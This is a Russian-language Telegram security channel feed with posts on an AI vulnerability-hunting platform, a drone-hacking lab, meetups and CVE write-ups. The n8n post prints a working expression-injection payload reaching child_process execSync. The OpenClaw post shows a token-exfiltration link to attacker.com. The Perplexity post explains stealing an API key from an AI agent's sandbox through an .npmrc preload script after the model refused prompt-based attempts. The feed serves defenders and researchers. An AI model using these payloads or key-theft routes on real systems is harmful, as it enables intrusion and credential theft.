PurpleBear


Гео и язык канала: Россия, Русский
Категория: Технологии


Канал о практической ИБ, Pentest, Red Team и Purple Team тестировании.
Мы публикуем новости, обзоры инструментов защитников и атакующих, анализируем отчеты APT группировок, разбираем популярные уязвимости, обсуждаем новые CVE'шки и многое другое

Связанные каналы  |  Похожие каналы

Гео и язык канала
Россия, Русский
Категория
Технологии
Статистика
Фильтр публикаций


Open·kritt

Open-source платформа для оркестрации AI-агентов, которые ищут уязвимости в исходном коде.
Идея в том, что скармливать LLM целый репозиторий с промптом найди все уязвимости обычно не очень эффективно😅 Поэтому исследование разбивается на небольшие связанные задачи, которые выполняются последовательно или параллельно, а результаты передаются следующим агентам.

Основной объект платформы - Workflow: дерево prompt-шагов с настраиваемыми переменными, связями и output schema.
Например, встроенный external-flow-analysis работает так:
📌 Первый агент ищет внешние entrypoints
📌 Следующие агенты тыкают достижимые execution flows
📌 Каждый flow отдельно исследуется на наличие уязвимостей
📌 Результат возвращается в структурированном виде: описание, тип уязвимости, файл, строка, trigger flow, malicious input и оценка возможности эксплуатации.

Прдзадачи одного уровня могут выполняться параллельно, поэтому вместо одного огромного контекста получается несколько сфокусированных исследований.
Что умеет open·kritt:
✔️ Создавать workflow в визуальном редакторе или генерировать их с помощью AI
✔️ Настраивать промты, переменные, зависимости и output schemas
✔️ Анализировать локальные и GitHub-репозитории, включая приватные
✔️ Подключать дополнительные репозитории как dependencies
✔️ Использовать Agent Skills для конкретных языков, архитектур и классов уязвимостей
✔️ Автоматически дедуплицировать и ранжировать находки
✔️ Запускать post-scripts для дополнительной проверки находок
✔️ Управлять сканированиями через Web UI и HTTP API

После основного workflow запускается post-processing. Сначала semantic deduplication объединяет находки, относящиеся к одной root cause и location/entrypoint. Простого совпадения по классу уязвимости недостаточно👍
Затем находки ранжируются с учётом impact, exploit likelihood, scope и вероятности bounty💰Критерии оценки критичности можно также настраивать с помощью текстовых инструкций.
После этого для каждого канонического файндинга могут запускаться post-scripts. Дополнительному агенту можно поручить проверить эксплуатацию, собрать доказательства, подготовить PoC, уточнить влияние или сформировать отчёт.

Сейчас есть два встроенных workflow:
🔴 external-flow-analysis - исследование entrypoints и достижимых от них execution flows
🔴 Cosmos ABCI Panic Halt Review - поиск panic-path в Go-приложениях на базе Cosmos ABCI
В качестве агентов используются Codex и Claude Code. Для доступа к моделям поддерживаются Codex login, OpenAI API, Anthropic API и OpenRouter API.

Отдельно стоит учитывать модель угроз. Хотя платформа разворачивается локально, исходный код может передаваться выбранному внешнему провайдеру.
Tool-enabled агенты работают от root в одноразовых docker-контейнерах, получают доступную для записи копию репозитория и прямой доступ в интернет. Сами job-контейнеры не получают docker socket, базу данных и .env, но engine управляет docker daemon. Поэтому запускать платформу рекомендуется на отдельной VM.
Backend по умолчанию не имеет в аутентификацию. Порты привязаны слушают на localhost, но выставлять интерфейс наружу без reverse proxy и дополнительной аутентификации точно не стоит🙈
Авторы заявляют, что заработали более $1,5 млн на bug bounty, и приводят ссылки на профили Immunefi и HackenProof.

По сути это не очередной AI-SAST, а платформа для декомпозиции security research: управляемые промты, параллельные агенты, структурированные результаты, deduplication, ranking и дополнительная валидация.
Полноту покрытия никто не гарантирует, а результаты всё равно требуют ручной проверки. Но для автоматизации source code review и экспериментов с AI-агентами выглядит очень неплохо🔥


Damn Vulnerable Drone

Всем привет! Давно я не писал нормальных постов, надо исправляться👇
Если заниматься безопасностью дронов на реальном стенде, обычно нужен как минимум сам дрон, полётный контроллер, набор радиомодулей и достаточно свободного пространства.

На выходных мне попался на глаза интересный проект Damn Vulnerable Drone - лаборатория для изучения атак на дроны, основанная на популярной архитектуре ArduPilot/MAVLink и полностью разворачиваемая в Docker.
Под капотом используется ArduPilot SITL (Software-in-the-Loop), позволяющий запускать прошивку полётного контроллера в виртуальном окружении. В Full Mode к нему добавляется Gazebo с физикой и полноценной 3D-симуляцией, а в Lite Mode используется встроенная 2D-модель динамики полёта ArduPilot без необходимости в GPU.

Что внутри:
✔️ Flight Controller с ArduPilot SITL
✔️ Companion Computer с веб-интерфейсом и виртуальным serial-соединением с полётным контроллером
✔️ MAVLink Router для маршрутизации телеметрии
✔️ Интеграция с MAVProxy и запуск QGroundControl в один клик на x86
✔️ Виртуальная Wi-Fi-сеть 802.11 в режимах WEP и WPA2
✔️ RTSP-стрим с бортовой камеры, управление gimbal и интеграция с Companion Computer
✔️ Динамические ArduPilot .bin flight logs на виртуальной SD-карте
✔️ Management Console для запуска сценариев и управления состояниями полёта
✔️ Детальные walkthrough для каждого сценария, спрятанные под spoiler, чтобы сразу не портить удовольствие😎
Можно запускать пять состояний дрона: Initial Boot, Arm & Takeoff, Autopilot Flight, Emergency/Return-To-Land и Post-Flight Data Processing.

Атакующих сценариев внутри уже прилично:
🔴 Wi-Fi analysis, cracking и deauthentication
🔴 Обнаружение дрона, Companion Computer и Ground Control Station
🔴 Packet Sniffing и Protocol Fingerprinting
🔴 Обнаружение GPS и телеметрии
🔴 MAVLink Injection и подмена Ground Control Station
🔴 GPS, attitude, battery, system status и satellite spoofing
🔴 Waypoint Injection и извлечение полётной миссии
🔴 Geofencing Attack и Return-to-Home Point Override
🔴 Flight Termination и Denial-of-Takeoff
🔴 Перехват RTSP-стрима и захват управления gimbal
🔴 Извлечение параметров и flight logs
🔴 Companion Computer Takeover
🔴 ROS 2 DDS Graph Enumeration, Topic Replay и Rogue Publisher Injection
🔴 Firmware Decompile и Firmware Modding
🔴 Различные DoS и flooding-атаки на каналы управления

Для быстрого старта в Lite Mode без GPU и виртуальной Wi-Fi-сети достаточно:
git clone https://github.com/nicholasaleks/Damn-Vulnerable-Drone.git
cd Damn-Vulnerable-Drone
sudo ./start.sh --mode lite --no-wifi
А для полноценной симуляции с Gazebo и виртуальной WPA2-сетью:
sudo ./start.sh --mode full --wifi wpa2

Для Full Mode официально поддерживается только Kali Linux. Авторы рекомендуют 8–16 GB RAM, 2–4 CPU cores, 100 GB свободного места и GPU с поддержкой OpenGL 3.0+. Lite Mode может работать на большинстве Linux-дистрибутивов и требует примерно 4–8 GB RAM, 2 CPU cores, 100 GB свободного места и не нуждается в GPU.

По сути получилась хорошая лаба, в которой можно безопасно изучать архитектуру современных беспилотников, MAVLink, телеметрию, системы управления и техники атак, не рискуя превратить реальный дрон в дорогостоящий кирпич🔥
Конечно, виртуальная лаборатория не заменит работу с реальным железом, радиоканалами и особенностями конкретных производителей, но для знакомства с drone hacking, проведения тренировок и отработки базовых техник выглядит очень достойно.

⚙️ Репозиторий: https://github.com/nicholasaleks/Damn-Vulnerable-Drone
📚 Attack Scenarios: https://github.com/nicholasaleks/Damn-Vulnerable-Drone/wiki/Attack-Scenarios


Поздравляю победителей🎉
В ближайщее время свяжусь со всеми в ЛС✍️




🎉 Результаты розыгрыша:

🏆 Победители:
1. Stan (@Stan393)
2. Yaroslav
3. Mister (@mrViscous)

✔️Проверить результаты


ASSUME BIRCH MEETUP #6

18 июня в Москве пройдёт ASSUME BIRCH MEETUP #6 - закрытая встреча для специалистов в области атакующей информационной безопасности.

Формат прежний:
Никаких рекламных докладов и случайных людей.
Только наше комьюнити, толковые доклады и хороший отдых после работы.

Что будет:
📍 закрытая московская локация
🗣 доклады от экспертов, которым есть что рассказать
🍻 напитки, закуски и неформальная атмосфера
🤝 общение с теми, кто понимает ваши шутки про дедлайны, скоуп и внезапные “а давайте ещё вот это проверим”

Мероприятие приватное, записей не будет, вход только по приглашениям.
Но, как обычно, есть шанс попасть внутрь без тайного рукопожатия: разыгрываем 3 проходки.

Условия простые:
⚡️ подписаться на @assume_birch и @purple_medved
⚡️ нажать кнопку - Участвовать
⚡️ дождаться, пока бездушный рандом выберет везунчиков 02.06.2026 в 13:37

Просьба одна: участвуйте только если точно сможете прийти.
До встречи!


С Днём Победы!

Этот день навсегда останется символом мужества, стойкости и героизма нашего народа.

Мы чтим каждого героя, кто отстоял мир и свободу, подарив нам возможность жить и развиваться!


Репост из: Видеоканал Global Digital Space
◻️◻️◻️◻️◻️
Защита ДБО: как банки противостоят целевым атакам в 2026 году | Цифровизация банков

Дистанционное банковское обслуживание — лакомая цель для злоумышленников. Атаки становятся точнее, умнее и всё сложнее отличимы от действий легитимного пользователя. Как банки отвечают на этот вызов?

В этом выпуске совместного подкаста Global Digital Space и Национального банковского журнала «Цифровизация банков» разбираемся, как устроена защита ДБО в 2026 году.

Говорим о том, что происходит прямо сейчас:
✅ какие атаки на ДБО наиболее опасны сегодня и как изменился их профиль;
✅ где граница ответственности между антифродом, WAF и API security;
✅ как ИИ и дипфейки меняют арсенал злоумышленников;
✅ насколько оправданы бюджеты на соответствие требованиям регуляторов;
✅ зрелость российских решений: где ещё есть пробелы;
✅ как улучшить клиентский путь, не жертвуя безопасностью.

🎙 Ведущий: Вадим Шелест, Wildberries & Russ

Эксперты:
🎼 Ирина Чурикова, SafeTech
🎼 Павел Луцик, КриптоПро
🎼 Владимир Гриднев, WMX (Вебмониторэкс)
🎼 Олег Волков, банк Кубань Кредит
🎼 Дмитрий Никишов, банк ДОМ.РФ

Смотрите тут

📺 VK Видео 📺 YouTube
📺 RUTUBE 📝 Дзен

#GDS #NBJ #подкаст


Hacked Perplexity Computer and got unlimited Claude Code 🤖

Сегодня хочу рассказать про интересное исследование Perplexity Computer - отличный пример того, где ломается agent‑инфраструктура.

Исследователь изучал sandboxing multi‑agent системы и обнаружил внутри sandbox установленный Claude Code (Node.js, bypass‑permissions mode) Поэтому возник вполне логичный вопрос - где хранится Anthropic API key и как он изолирован?

6 попыток вытащить ключ провалились - модель и prompt‑safety реально отработали хорошо:
🔴 dump process.env - отказ
🔴 троян на shared FS - агент понял подвох
🔴.bashrc / PATH hijack —-не сработало
🔴 system prompt - не найден

А потом классика supply‑chain атак 😎
Claude Code - это Node.js → запускается через npm → npm читает ~/.npmrc → home‑директория доступна на shared filesystem.

Через .npmrc можно задать:
node-options=--require /path/to/preload.js
--require подгружает JS до старта приложения и до любых safety‑проверок.

💣 Эксплоит = 3 команды:
1️⃣ preload‑скрипт, который пишет process.env в файл
2️⃣ запись .npmrc
3️⃣ любая задача

Результат - доступ к Perplexity proxy‑token к Anthropic API.
И самое интересное:
🔴 токен не IP‑restricted
🔴 не sandbox‑bound
🔴 не ephemeral
🔴 биллинг на Perplexity

100k+ токенов × несколько запусков → деньги не списываются.
Фактически unlimited Claude Code за их счёт 💸
Модель всё сделала правильно - сломалась именно архитектура.

Если вы строите agent‑infra, стоит подумать про:
🔐 токен должен быть привязан к sandbox
⏳ токен должен быть короткоживущим
💳 usage должен биллиться на пользователя
Иначе proxy - это просто лишний network hop, который ничего не защищает.

Большинство multi‑agent продуктов сегодня устроены примерно так же 😎


One-Click RCE + unauth API keys leak в OpenClaw/Clawdbot/Moltbot (CVE‑2026‑25253)

Исследователи из Hunt.io разобрали потенциальные последствия эксплуатации уязвимости CVE‑2026‑25253 с оценкой CVSSv3 = 8.8 в OpenClaw и его форках (Clawdbot, Moltbot). Это browser‑automation фреймворки, связывающие LLM с браузером через Playwright. Эти агенты обычно имеют доступ к файловой системе и API‑ключам LLM, что автоматически делает последствия эксплуатации довольно критичными.

🤦 Основная проблема:
1️⃣ Ручка /api/export-auth доступна без аутентификации
2️⃣ Позволяет выгрузить все сохранённые API‑токены провайдеров LLM (OpenAI, Claude, Google AI и др.)

⚙️ Технические детали эксплуатации
OpenClaw до патча:
1️⃣ Читает параметр gatewayUrl из query‑string
2️⃣ Автоматически подключается к нему по WebSocket
3️⃣ Без подтверждения пользователя отправляет auth‑токен на хост атакующего

💫 Сценарий:
1️⃣ Жертва кликает ссылку:
https://victim-openclaw-ui/?gatewayUrl=wss://attacker.com/exfil
2️⃣ OpenClaw сам подключается к WebSocket на хосте атакующего
3️⃣ Токен мгновенно утекает атакующему
4️⃣ Атакующий использует токен для подключения к Gateway API жертвы
5️⃣ Меняет конфигурацию агента
6️⃣ Вызывает привилегированные API → выполнение произвольного кода на хосте

📊 Масштаб последствий
17 500+ публично доступных инстансов в интернете
68.9% — Clawdbot Control
22.3% — Moltbot Control
8.8% — OpenClaw Control

✅ Рекомендации:
1️⃣ Обновиться до версии OpenClaw v2026.1.29
2️⃣ Считать все ключи скомпрометированными, проверить балансы провайдеров LLM, провести ротацию ключей
3️⃣ Использовать естественный интеллект
4️⃣ Не публиковать AI‑агентов в интернет


Репост из: AM Live
⚠️ Почему API — главная дыра в защите веб-приложений

Даже когда настроены WAF, анти-DDoS и антибот — атаки не прекращаются. Всё чаще защита ломается именно на API: здесь обходят авторизацию, валидаторы и получают доступ к бизнес-логике.

28 января в 11:00 в прямом эфире AM Live покажем, почему API — слабое звено даже в хорошо защищённых веб-приложениях и что с этим делать.

Что вы узнаете:
— Какие уязвимости чаще всего дают атакам зелёный свет
— Как разделить зону ответственности между шлюзами, логикой и разработкой
— Как защитить API, чтобы не стать «точкой входа»

🔗 Регистрируйтесь на эфир по ссылке


n8n Expression Injection → RCE (CVE‑2025‑68613)

В конце прошлого года были опубликованы технические детали эксплуатации критической уязвимости CVE‑2025‑68613 с оценкой CVSSv3 = 9.9 в популярной open‑source платформе автоматизации n8n
n8n - workflow‑движок на Node.js, широко используемый для автоматизации LLM интеграций. У меня n8n используется для домашней автоматизации в качестве альтернативы Node-Red для Home Assistant, но также достаточно часто разворачивается внутри корпоративных сетей, что делает последствия эксплуатации довольно критичными.

В n8n используется механизм expressions - любые значения в формате ` `.``.``.` ` интерпретируются как JavaScript и обрабатываются на стороне сервера как есть🤷

Проблема в том, что:
🔴 expression evaluator не имеет строгой sandbox‑изоляции;
🔴 возможен доступ к prototype chain;
🔴 выражения исполняются через небезопасные конструкции уровня Function().
В результате expression injection позволяет выйти из песочницы и получить доступ к runtime Node.js

POC демонстрирующий побег из sandbox:
{{ this.constructor.constructor("return process")() }}

this.constructor → Function
Function.constructor → снова Function
создаётся новая функция, возвращающая process

Дальше всё предсказуемо - получаем child_process и выполняем команды ОС:
{{
this.constructor
.constructor(
"return process.mainModule.require('child_process')" +
".execSync('id').toString()"
)()
}}

Таким образом имея непривилегированную учётку n8n, атакующий может:
✔️ прокинуть себе reverse shell
✔️ украсть токены, секреты и креды из workflow
✔️ модифицировать или подменить бизнес‑логику автоматизации

⚙️ POC: https://github.com/TheStingR/CVE-2025-68613-POC
🔎 Nuclei: https://github.com/rxerium/CVE-2025-68613/blob/main/CVE-2025-68613.yaml
🪲 Уязвимые версии ПО: 0.211.0 – 1.120.3
✅ Рекомендации: Обновиться до версии 1.120.4 / 1.121.1 / 1.122.0


Поздравляю с наступающим Новым годом! 🥳

Пусть в новом году будет больше спокойствия, уверенности и радости от жизни - не только от работы, но и от простых моментов рядом с близкими.

Желаю крепкого здоровья вам и вашим семьям, внутреннего баланса, сил и энергии идти вперёд.
Пусть будет время на себя, на отдых, на мечты и на то, что действительно важно!

Пусть 2026 год станет годом больших достижений, правильных решений и уверенности в завтрашнем дне.
Живите так, как хочется, цените себя и людей рядом и не забывайте радоваться мелочам.

Отдельное спасибо каждому из вас - за интерес, доверие, обратную связь и участие в развитии канала. Благодаря вам хочется продолжать и делать его лучше.

С наступающим Новым годом! 🎉
До встречи в 2026❤️


Всем привет!
Запись прямого эфира AM Live на тему «Стратегия информационной безопасности: от разработки до применения» доступна по ссылке: https://www.youtube.com/watch?v=ymcaRTqbR-0
Эфир для тех, кто не хочет узнавать о провале стратегии после атаки из новостей.

❓ Ваша стратегия ИБ — работает? Или это просто файл в папке?
❓ У вас есть метрики зрелости? Критерии эффективности? Проверки в реальных условиях?

Мы с коллегами обсудили:
✅ Как понять, что стратегия ИБ не работает
✅ Что эффективнее: KPI по инцидентам или уровню зрелости
✅ Как проверять устойчивость стратегии с помощью регулярных пентестов и кибериспытаний
✅ Как визуализировать стратегию для совета директоров, чтобы вас услышали

Эфир получился жарким, наполненным интересными дискуссиями между представителями внешнего консалтинга и CISO крупных компаний.

Приятного просмотра! Буду очень признателен за лайки, репосты и комментарии 🙏


Поздравляю победителей🎉
В ближайщее свяжусь со всеми в ЛС✍️


🎉 Результаты розыгрыша:

🏆 Победители:
1. S3 (@s3n_q)
2. Anton (@st1zz999)
3. Over (@elviacro)

✔️Проверить результаты


Видео недоступно для предпросмотра
Смотреть в Telegram
ASSUME BIRCH MEETUP #5

Декабрь - это не только горящие дедлайны и подведение итогов года. Это еще и идеальное время, чтобы выдохнуть и встретиться с коллегами "по цеху" 🍻 на митапе для специалистов в области атакующей информационной безопасности ASSUME BIRCH #5

Что в программе:
📍 Уютный московский бар и расслабленная обстановка
🗣 Крутые доклады от топовых экспертов индустрии
🍔 Закуски, напитки и возможность выиграть крутой мерч
🤝 Нетворкинг и отличное настроение

📆 04 декабря, 18:30
📍Москва, точная локация будет указана в персональном приглашении

Мероприятие традиционно приватное, записей не будет, вход только по персональным приглашениям.

Но есть 3 проходки, которые мы разыграем. Условия простые, необходимо просто заломать мосад подписаться на каналы @assume_birch и @purple_medved и нажать кнопку Участвовать, а победителей определит бездушный рандом 27.11 в 13:37 Единственная просьба - вписываться, только если уверены что 100% получится прийти🙏


JA4D and JA4D6: DHCP Fingerprinting

Всем привет! Давно я ничего не писал, потому что, как буквально вчера сказал один мой хороший друг ..."Q4, выживаем как можем"... поэтому сразу лайк, этому посту, у кого тоже самое😜

Пару лет назад я писал про фреймворк JA4+ Network Fingerprinting для снятия отпечатков с трафика, который активно используется различными СЗИ для идентификации вредоносной активности на уровне сети. А на прошлой неделе вышли дополнения JA4D и JA4D6 позволяющие определять активы в момент подключения к сети на основе запросов DHCP/DHCPv6. Суть метода заключается в сравнение фингерпринтов при подключении для основных запросов DHCP/DHCPv6 с библиотекой известных устройств. На данный момент библиотека отпечатков для этого дополнения пока небольшая, но учитывая большую популярность фреймворка у различных вендоров она 100% быстро разрастется.

Таким образом, можно очень быстро идентифицировать любые недоверенные устройства/ОС в вашей корпоративной сети, без активного сканирования. При этом методов байпаса для JA4+ фактически не существует, поэтому любая пентестерская kali lincox😂 будет моментально светиться в логах СЗИ 👍




Всем привет!
Запись прямого эфира на тему «Offensive Security: как превратить пентесты и Red Team в стратегию» доступна на каналах AM Live.

Традиционная безопасность отвечает на атаки. Offensive Security — предупреждает их.
Если вы всё ещё «закрываете периметр» и «повышаете осведомлённость сотрудников» — возможно, вы просто играете в оборону.

Мы с коллегами говорили о компаниях, которые пошли дальше: регулярно проводят Red Teaming силами внешних подрядчиков или строят собственные внутренние команды, запускают Bug Bounty и превращают пентесты из формальности в системную практику.

YouTube
VK Видео
RuTube

Приятного просмотра!

PS: Буду очень признателен за лайки, комментарии и конструктивную критику🙏

Показано 20 последних публикаций.